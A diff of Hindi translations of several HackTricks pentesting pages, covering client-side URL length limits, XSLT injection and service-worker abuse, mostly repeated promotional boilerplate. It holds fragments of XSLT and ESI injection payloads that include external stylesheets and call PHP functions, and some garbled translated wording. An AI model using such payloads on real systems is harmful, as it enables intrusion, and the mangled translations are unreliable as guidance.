<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
@ -56,12 +56,12 @@ document.addEventListener('DOMContentLoaded', main);
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** पर **फॉलो** करें
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -1,18 +1,18 @@
# URL अधिकतम लंबाई - क्लाइंट साइड
# URL Max Length - Client Side
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **जुड़ें** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) से या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PRs सबमिट करके.**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
कोड [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit) से
Code from [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
```html
<html>
<body></body>
@ -82,10 +82,10 @@ app.run(host='0.0.0.0', port=1337)
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo** को PRs सबमिट करके [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PRs सबमिट करके**
</details>

View file

@ -4,25 +4,25 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) पर PR जमा करके**।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**.
</details>
## मूल जानकारी
XSLT एक प्रौद्योगिकी है जो XML दस्तावेज़ों को विभिन्न प्रारूपों में रूपांतरित करने के लिए प्रयोग की जाती है। इसके तीन संस्करण हैं: 1, 2, और 3, जिसमें संस्करण 1 सबसे अधिक प्रयोग किया जाता है। रूपांतरण प्रक्रिया को सर्वर पर या ब्राउज़र के अंदर चलाया जा सकता है।
XSLT एक प्रौद्योगिकी है जो XML दस्तावेज़ों को विभिन्न प्रारूपों में रूपांतरित करने के लिए प्रयोग की जाती है। इसमें तीन संस्करण होते हैं: 1, 2, और 3, जिसमें संस्करण 1 सबसे अधिक प्रयोग किया जाता है। रूपांतरण प्रक्रिया को सर्वर पर या ब्राउज़र के अंदर चलाया जा सकता है।
सबसे अधिक प्रयोग किए जाने वाले फ्रेमवर्क हैं:
सबसे अधिक प्रयोग किए जाने वाले फ्रेमवर्क शामिल हैं:
- **Gnome** से **Libxslt**,
- **Apache** से **Xalan**,
- **Saxonica** से **Saxon**
XSLT के संबंधित दुरुपयोगों का उपयोग करने के लिए, यह आवश्यक है कि सर्वर साइड पर xsl टैग संग्रहीत किए जाएं, इसके बाद उस सामग्री तक पहुंचा जाए। इस तरह की एक दुरुपयोग की चित्रण निम्नलिखित स्रोत में दर्ज किया गया है: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
XSLT के संबंधित वंशातिकता का शोधन करने के लिए, यह आवश्यक है कि एक्सएसएल टैग सर्वर साइड पर संग्रहीत हों, और उस सामग्री तक पहुंचा जाए। इस तरह की एक वंशातिकता का उदाहरण निम्न स्रोत में दर्ज किया गया है: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
## उदाहरण - ट्यूटोरियल
```bash
@ -207,7 +207,7 @@ Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:sup
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
</esi:include>
```
## जावास्क्रिप्ट इन्जेक्शन
## जावास्क्रिप्ट इजेक्शन
```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
@ -309,7 +309,7 @@ Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:sup
</xsl:template>
</xsl:stylesheet>
```
## फ़ाइल में लिखें
## एक फ़ाइल में लिखें
### XSLT 2.0
```xml
@ -330,7 +330,9 @@ Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:sup
<redirect:close file="loxal_file.txt"/>
</xsl:template>
```
## बाहरी XSL शामिल करें
## बीडीएफ में फ़ाइलें लिखने के अन्य तरीके
## बाहरी एक्सएसएल शामिल करें
```xml
<xsl:include href="http://extenal.web/external.xsl"/>
```
@ -366,9 +368,9 @@ xmlns:php="http://php.net/xsl" >
**इस पृष्ठ पर आप अन्य भाषाओं में RCE के उदाहरण देख सकते हैं:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)**
## **कक्षाओं से PHP स्थैतिक फ़ंक्शन्स तक पहुंचें**
## **कक्षाओं से PHP स्थैतिक फ़ंक्शन का उपयोग करें**
निम्नलिखित फ़ंक्शन XSL कक्षा के स्थैतिक विधि `stringToUrl` को बुलाएगा:
निम्नलिखित फ़ंक्शन XSL की कक्षा के स्थैतिक विधि `stringToUrl` को बुलाएगा:
```xml
<!--- More complex test to call php class function-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"
@ -401,10 +403,10 @@ version="1.0">
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* पाएं [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**द पीएएस फैमिली**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* पाएं [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>

View file

@ -1,20 +1,22 @@
# वेब सर्विस वर्कर्स का दुरुपयोग
# सेवा कर्मचारियों का दुरुपयोग
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में।**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे सुरक्षा विकल्प खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपके पूरे तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks) आज।
वे सुरक्षा गड़बड़ियों को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरी तकनीक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,31 +24,32 @@
## मूल जानकारी
**सर्विस वर्कर** एक स्क्रिप्ट है जो आपके ब्राउज़र द्वारा पृष्ठ से अलग, वेब पृष्ठ या उपयोगकर्ता अंतर्क्रिया की आवश्यकता नहीं है, जिससे **ऑफलाइन और पृष्ठ प्रसंस्करण** क्षमताएँ बढ़ाई जा सकती हैं। सर्विस वर्कर्स पर विस्तृत जानकारी [यहाँ](https://developers.google.com/web/fundamentals/primers/service-workers) मिल सकती है। एक वेब डोमेन के भीतर सर्विस वर्कर्स का दुरुपयोग करके हमलावर विकल्पों को प्राप्त कर सकते हैं और उस डोमेन के सभी पृष्ठों के साथ पीड़ित के इंटरैक्शन पर नियंत्रण प्राप्त कर सकते हैं।
**सेवा कर्मचारी** एक स्क्रिप्ट है जो आपके ब्राउज़र द्वारा पृष्ठ से अलग, किसी भी वेब पृष्ठ या उपयोगकर्ता अंतर्क्रिया की आवश्यकता नहीं है, जिससे **ऑफलाइन और पृष्ठ प्रसंस्करण** क्षमताएँ बढ़ाई जा सकती हैं। सेवा कर्मचारियों पर विस्तृत जानकारी [यहाँ](https://developers.google.com/web/fundamentals/primers/service-workers) मिल सकती है। एक विकल्पीय वेब डोमेन के भीतर सेवा कर्मचारियों का दुरुपयोग करके हमलावर वेब डोमेन के सभी पृष्ठों के साथ पीड़ित के इंटरैक्शन पर नियंत्रण प्राप्त कर सकते हैं।
### मौजूदा सर्विस वर्कर्स की जांच
मौजूदा सर्विस वर्कर्स की जांच **डेवलपर टूल्स** में **एप्लिकेशन** टैब के **सर्विस वर्कर्स** खंड में की जा सकती है। एक और तरीका है [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) पर जाकर एक अधिक विस्तृत दृश्य प्राप्त करना।
### मौजूदा सेवा कर्मचारियों की जांच
### पुश अधिसूचनाएं
मौजूदा सेवा कर्मचारियों की जांच **डेवलपर टूल्स** में **एप्लिकेशन** टैब के **सेवा कर्मचारियों** खंड में की जा सकती है। एक और तरीका है [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) पर जाकर एक अधिक विस्तृत दृश्य प्राप्त करना।
**पुश अधिसूचना अनुमतियाँ** सीधे रूप से **सर्विस वर्कर** की क्षमता पर प्रभाव डालती हैं क्योंकि यह सर्विस वर्कर की संभावना को सीधे उपयोगकर्ता अंतर्क्रिया के बिना सर्वर के साथ संवाद करने की क्षमता पर प्रभाव डालती है। यदि अनुमतियाँ निरस्त की जाती हैं, तो यह सर्विस वर्कर की संभावना को एक निरंतर खतरा प्रस्तुत करने में सीमित करता है। उल्टे, अनुमतियाँ प्रदान करने से सुरक्षा जोखिम बढ़ जाते हैं क्योंकि यह संभावित दुरुपयोगों को प्राप्त करने और क्रियान्वित करने की क्षमता को सक्षम करता है।
### पुश सूचनाएं
## हमला एक सर्विस वर्कर बनाना
